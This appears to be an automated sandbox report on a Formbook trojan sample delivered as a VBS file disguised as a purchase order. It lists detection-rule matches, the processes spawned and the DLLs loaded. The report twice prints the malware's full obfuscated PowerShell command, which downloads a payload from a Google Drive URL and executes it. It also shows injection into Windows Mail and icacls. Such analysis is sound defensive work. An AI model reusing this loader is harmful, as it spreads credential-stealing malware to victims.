Source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1424, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4328, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@19/10@6/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Udjvne.Mai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5elpknk4.obd.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO 26519PZ F30 59.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1424
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4328
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: PO 26519PZ F30 59.vbs ReversingLabs: Detection: 18%
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. 
BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. 
BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: dpapi.dll Jump to behavior
